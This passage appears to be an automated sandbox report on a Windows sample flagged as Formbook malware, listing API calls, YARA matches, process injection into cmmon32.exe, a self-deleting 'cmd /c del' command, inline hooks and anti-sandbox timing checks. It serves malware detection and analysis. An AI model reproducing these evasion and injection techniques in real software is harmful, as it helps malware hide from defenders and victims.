          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39950 NtQueueApcThread,5_2_04D39950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39A80 NtOpenDirectoryObject,5_2_04D39A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39A10 NtQuerySection,5_2_04D39A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39A00 NtProtectVirtualMemory,5_2_04D39A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39A20 NtResumeThread,5_2_04D39A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D3A3B0 NtGetContextThread,5_2_04D3A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39B00 NtSetValueKey,5_2_04D39B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59D60 NtCreateFile,5_2_00E59D60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59E90 NtClose,5_2_00E59E90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59E10 NtReadFile,5_2_00E59E10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59F40 NtAllocateVirtualMemory,5_2_00E59F40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59DB2 NtReadFile,5_2_00E59DB2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59D5A NtCreateFile,5_2_00E59D5A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59E8E NtClose,5_2_00E59E8E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59E0A NtReadFile,5_2_00E59E0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E59F3B NtAllocateVirtualMemory,5_2_00E59F3B
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_022FC21C0_2_022FC21C
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_022FEBF80_2_022FEBF8
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_022FEBF40_2_022FEBF4
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_045215E20_2_045215E2
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_045210780_2_04521078
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_045213900_2_04521390
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_04523EB70_2_04523EB7
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_0452165E0_2_0452165E
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_0452167A0_2_0452167A
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_045210680_2_04521068
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_045213810_2_04521381
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_04520D980_2_04520D98
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_04520D880_2_04520D88
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041D8922_2_0041D892
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041E25C2_2_0041E25C
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041DA862_2_0041DA86
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041E59A2_2_0041E59A
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041E59D2_2_0041E59D
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00409E402_2_00409E40
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041D63B2_2_0041D63B
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00409E3B2_2_00409E3B
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041D71D2_2_0041D71D
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041CFA62_2_0041CFA6
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBD4665_2_04DBD466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0841F5_2_04D0841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC25DD5_2_04DC25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0D5E05_2_04D0D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D225815_2_04D22581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC1D555_2_04DC1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC2D075_2_04DC2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF0D205_2_04CF0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC2EF75_2_04DC2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBD6165_2_04DBD616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D16E305_2_04D16E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DCDFCE5_2_04DCDFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC1FF15_2_04DC1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC28EC5_2_04DC28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B0905_2_04D0B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A05_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC20A85_2_04DC20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB10025_2_04DB1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DCE8245_2_04DCE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFF9005_2_04CFF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D141205_2_04D14120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC22AE5_2_04DC22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB03DA5_2_04DB03DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBDBD25_2_04DBDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2EBB05_2_04D2EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC2B285_2_04DC2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D8925_2_00E5D892
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E25C5_2_00E5E25C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42D875_2_00E42D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42D905_2_00E42D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E59D5_2_00E5E59D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E59A5_2_00E5E59A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E49E405_2_00E49E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D63B5_2_00E5D63B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E49E3B5_2_00E49E3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CFA65_2_00E5CFA6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42FB05_2_00E42FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D71D5_2_00E5D71D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04CFB150 appears 45 times
          Source: CI_PL #WS190903_20201016_XLs.exeBinary or memory string: OriginalFilename vs CI_PL #WS190903_20201016_XLs.exe
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.660535863.0000000005770000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs CI_PL #WS190903_20201016_XLs.exe
          Source: CI_PL #WS190903_20201016_XLs.exeBinary or memory string: OriginalFilename vs CI_PL #WS190903_20201016_XLs.exe
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.696087173.00000000016DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CI_PL #WS190903_20201016_XLs.exe
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695515904.00000000013F9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs CI_PL #WS190903_20201016_XLs.exe
          Source: CI_PL #WS190903_20201016_XLs.exeBinary or memory string: OriginalFilename vs CI_PL #WS190903_20201016_XLs.exe
          Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/2
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CI_PL #WS190903_20201016_XLs.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
          Source: CI_PL #WS190903_20201016_XLs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: CI_PL #WS190903_20201016_XLs.exeVirustotal: Detection: 31%
          Source: CI_PL #WS190903_20201016_XLs.exeReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'Jump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: CI_PL #WS190903_20201016_XLs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CI_PL #WS190903_20201016_XLs.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695262569.0000000001199000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.670384513.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695262569.0000000001199000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695558444.0000000001430000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.911715226.0000000004CD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695558444.0000000001430000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.670384513.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: CI_PL #WS190903_20201016_XLs.exe, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.CI_PL #WS190903_20201016_XLs.exe.b0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.CI_PL #WS190903_20201016_XLs.exe.b0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.a10000.1.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.CI_PL #WS190903_20201016_XLs.exe.a10000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_04520521 push ss; retf 0_2_04520524
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 0_2_0452052B push ss; retf 0_2_0452052E
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_004168D5 push ecx; iretd 2_2_004168DC
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041C989 push eax; ret 2_2_0041C98D
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0040AC43 pushfd ; retf 2_2_0040AC44
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00407DA5 push ecx; retf 2_2_00407DA6
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00416DB3 push edi; retf 2_2_00416DB4
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D4D0D1 push ecx; ret 5_2_04D4D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E568D5 push ecx; iretd 5_2_00E568DC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5C989 push eax; ret 5_2_00E5C98D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E4AC43 pushfd ; retf 5_2_00E4AC44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E47DA5 push ecx; retf 5_2_00E47DA6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E56DB3 push edi; retf 5_2_00E56DB4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CEB5 push eax; ret 5_2_00E5CF08
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CF6C push eax; ret 5_2_00E5CF72
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CF02 push eax; ret 5_2_00E5CF08
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CF0B push eax; ret 5_2_00E5CF72

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEC
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: CI_PL #WS190903_20201016_XLs.exe PID: 7032, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000E498E4 second address: 0000000000E498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000E49B5E second address: 0000000000E49B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
